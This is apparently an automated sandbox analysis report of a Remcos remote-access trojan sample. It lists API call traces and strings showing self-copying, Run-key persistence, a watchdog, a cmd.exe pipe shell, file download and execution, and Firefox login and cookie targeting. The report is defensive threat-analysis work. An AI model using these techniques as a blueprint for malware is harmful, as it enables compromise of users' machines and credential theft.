                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4XYAW8PbZH.exe,00000104), ref: 0040D790
                                                                                                                                                                                                • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
• String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\4XYAW8PbZH.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
• API String ID: 2830904901-985225076
• Opcode ID: 639fc98fedbc16fab387638ab5a2c649c2c3843ca71600449f4dc7e2ce9c852b
• Instruction ID: 3e021a1a4b13f59cbd2257f1e4af8b1458c06fff599f70b9144805750af3581d
• Opcode Fuzzy Hash: 639fc98fedbc16fab387638ab5a2c649c2c3843ca71600449f4dc7e2ce9c852b
• Instruction Fuzzy Hash: 31329260B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

Control-flow Graph

APIs
• _wcslen.LIBCMT ref: 0040BC75
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
• CopyFileW.KERNEL32(C:\Users\user\Desktop\4XYAW8PbZH.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
• _wcslen.LIBCMT ref: 0040BD54
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
• CopyFileW.KERNEL32(C:\Users\user\Desktop\4XYAW8PbZH.exe,00000000,00000000), ref: 0040BDF2
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
• _wcslen.LIBCMT ref: 0040BE34
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
• ExitProcess.KERNEL32 ref: 0040BED0
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
• String ID: 6$C:\Users\user\Desktop\4XYAW8PbZH.exe$del$open$BG$BG
• API String ID: 1579085052-1351567777
• Opcode ID: f33fe05bea55441c491c63f8bba3e77330e3bc916226144ae537057c72fca099
• Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
• Opcode Fuzzy Hash: f33fe05bea55441c491c63f8bba3e77330e3bc916226144ae537057c72fca099
• Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE

Control-flow Graph

APIs
• GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: LongNamePath
• String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
• API String ID: 82841172-425784914
• Opcode ID: 8a32bfeeafc5adc396a0c99bd34a7f668c86cb88242ad76930939258757ea5bd
• Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
• Opcode Fuzzy Hash: 8a32bfeeafc5adc396a0c99bd34a7f668c86cb88242ad76930939258757ea5bd
• Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F

Control-flow Graph

APIs
  • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
  • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
  • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
  • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
• StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CloseCurrentOpenProcessQueryValue
• String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
• API String ID: 1866151309-3211212173
• Opcode ID: 0d130baeef4d248f6aaf17f7a7f34160bc2b9333c7d8d43989ef401e97546420
• Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
• Opcode Fuzzy Hash: 0d130baeef4d248f6aaf17f7a7f34160bc2b9333c7d8d43989ef401e97546420
• Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE

Control-flow Graph

control_flow_graph 652 446f53-446f6a GetLastError 653 446f6c-446f76 call 447476 652->653 654 446f78-446f7f call 448716 652->654 653->654 659 446fc9-446fd0 SetLastError 653->659 658 446f84-446f8a 654->658 660 446f95-446fa3 call 4474cc 658->660 661 446f8c 658->661 663 446fd2-446fd7 659->663 667 446fa5-446fa6 660->667 668 446fa8-446fbe call 446d41 call 446ad5 660->668 664 446f8d-446f93 call 446ad5 661->664 670 446fc0-446fc7 SetLastError 664->670 667->664 668->659 668->670 670->663
APIs
• GetLastError.KERNEL32(?,00000000,00000000,0043A7D2,00000000,?,?,0043A856,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F58
• _free.LIBCMT ref: 00446F8D
• _free.LIBCMT ref: 00446FB4
• SetLastError.KERNEL32(00000000), ref: 00446FC1
• SetLastError.KERNEL32(00000000), ref: 00446FCA
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
• Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
• Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
• Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F

Control-flow Graph

control_flow_graph 675 412774-412787 RegCreateKeyW 676 4127c6 675->676 677 412789-4127c4 call 4022f8 call 401e07 RegSetValueExW RegCloseKey 675->677 678 4127c8-4127d4 call 401e13 676->678 677->678
APIs
• RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
• RegSetValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,74DF37E0,?), ref: 004127AD
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004742E0,74DF37E0,?,?,?,?,?,0040BE18,?,00000000), ref: 004127B8
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
• API String ID: 1818849710-1051519024
• Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
• Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
• Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
• Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4

Control-flow Graph

control_flow_graph 685 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
• GetLastError.KERNEL32 ref: 0040BEF1
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CreateErrorLastMutex
• String ID: (CG
• API String ID: 1925916568-4210230975
• Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
• Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
• Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
• Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

Control-flow Graph

control_flow_graph 688 412513-41253f RegOpenKeyExA 689 412541-412567 RegQueryValueExA RegCloseKey 688->689 690 412572 688->690 689->690 692 412569-412570 689->692 691 412577-412583 call 401f66 690->691 692->691
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
• RegCloseKey.KERNEL32(?), ref: 0041255F
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 1596a47d3a3a9d7b824bf65cdf317066f9d5dabbc4d5e1023ecf94da71e9672a
• Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
• Opcode Fuzzy Hash: 1596a47d3a3a9d7b824bf65cdf317066f9d5dabbc4d5e1023ecf94da71e9672a
• Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8

Control-flow Graph

control_flow_graph 695 4124b7-4124df RegOpenKeyExA 696 4124e1-412509 RegQueryValueExA RegCloseKey 695->696 697 41250f-412512 695->697 696->697 698 41250b-41250e 696->698
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
• RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
• RegCloseKey.ADVAPI32(00000000), ref: 00412500
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
• Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
• Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
• Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98

Control-flow Graph

control_flow_graph 727 448716-448721 728 448723-44872d 727->728 729 44872f-448735 727->729 728->729 730 448763-44876e call 445364 728->730 731 448737-448738 729->731 732 44874e-44875f RtlAllocateHeap 729->732 737 448770-448772 730->737 731->732 733 448761 732->733 734 44873a-448741 call 4447d5 732->734 733->737 734->730 740 448743-44874c call 442210 734->740 740->730 740->732
APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F84,00000001,00000364,?,0043A856,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448757
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
• Instruction ID: 28044070be8b550b436e3a89d8ee4c5083ce1cba36f38117670c034d6afde2c5
• Opcode Fuzzy Hash: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
• Instruction Fuzzy Hash: 0FF0E03154562467BB217A669D56B5F7744AF41770B34402FFC04A6190CF68D901C2DD
APIs
• SetEvent.KERNEL32(?,?), ref: 00406F28
• GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
• DeleteFileW.KERNEL32(00000000), ref: 00407018
  • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B499
  • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4CB
  • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B51C
  • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B571
  • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B578
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
  • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
  • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
  • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
  • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
• GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
• SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
• DeleteFileA.KERNEL32(?), ref: 004078CC
  • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
  • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
  • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
• Sleep.KERNEL32(000007D0), ref: 00407976
• StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
  • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
• String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
• API String ID: 2918587301-599666313
• Opcode ID: 617277cc791489f5d4a9004504fc0227c35f05cf4c60253288cc452c9b7a6e02
• Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
• Opcode Fuzzy Hash: 617277cc791489f5d4a9004504fc0227c35f05cf4c60253288cc452c9b7a6e02
• Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B
APIs
• __Init_thread_footer.LIBCMT ref: 0040508E
  • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475C10,?,004017C1,00475C10,00000000), ref: 004334E9
  • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475C10,00000000), ref: 0043351C
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• __Init_thread_footer.LIBCMT ref: 004050CB
• CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
• CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
  • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,00475B90,00475C10,?,0040179E,00475C10), ref: 00433534
  • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475C10), ref: 00433571
• Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
• ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
  • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
• WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
• Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
• TerminateProcess.KERNEL32(00000000), ref: 004053C1
• CloseHandle.KERNEL32 ref: 004053CD
• CloseHandle.KERNEL32 ref: 004053D5
                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                                                              • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                                                                                                                                                                                              • API String ID: 3815868655-1274243119
                                                                                                                                                                                              • Opcode ID: cdf13e82471ad5efccb91d00ce4864fe8644f0f5189f5862159d9f8069fd826c
                                                                                                                                                                                              • Instruction ID: e174317c0cfdf92f2f57875e471bcaa01af682fbbee25a17085fe39bc952a1f7
                                                                                                                                                                                              • Opcode Fuzzy Hash: cdf13e82471ad5efccb91d00ce4864fe8644f0f5189f5862159d9f8069fd826c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 97910971504705AFD701BB25EC45A2F37A8EB84344F50443FF94ABA2E2DABC9D448B6E
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                                                                                                                                                • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                                                                                                                                                                • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                                                                                                              • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                                                                                                              • API String ID: 65172268-860466531
                                                                                                                                                                                              • Opcode ID: fb9dbb4756769c3cd24ee7adcec061e257e704e0881a6f9f62c6e3ac0e16f80b
                                                                                                                                                                                              • Instruction ID: cd90af3caa6d69ca3e9ea8718b5663318d6259183dea3b669bddfb6979e5fbe1
                                                                                                                                                                                              • Opcode Fuzzy Hash: fb9dbb4756769c3cd24ee7adcec061e257e704e0881a6f9f62c6e3ac0e16f80b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F718E316042415BC614FB32D8579AE77A4AED4718F40053FF582A21F2EF7CAA49C69F
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                                                                              • API String ID: 1164774033-3681987949
                                                                                                                                                                                              • Opcode ID: 40a99a48df38c0986ea1f072844720ef4507da5861f13f8a5a44a5df557391d4
                                                                                                                                                                                              • Instruction ID: 6ff196721abdd8e0f3db8d3f3c96df629808f1f9148939b99990ee587e15bfec
                                                                                                                                                                                              • Opcode Fuzzy Hash: 40a99a48df38c0986ea1f072844720ef4507da5861f13f8a5a44a5df557391d4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 31512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Find$Close$File$FirstNext
                                                                                                                                                                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                              • API String ID: 3527384056-432212279
                                                                                                                                                                                              • Opcode ID: 82d3bdde3c1918d27b7ca6b9febe00a20e513e275f4cf8a27e851897e9cca035
                                                                                                                                                                                              • Instruction ID: 007be0ece90fca0e9f39ea1f272cf2b8da877aadfcc1370f70eac597690c30d9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 82d3bdde3c1918d27b7ca6b9febe00a20e513e275f4cf8a27e851897e9cca035
                                                                                                                                                                                              • Instruction Fuzzy Hash: A7414B319042196ACB14F7A1EC569EE7768EF21318F50017FF801B31E2EF399A45CA9E
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
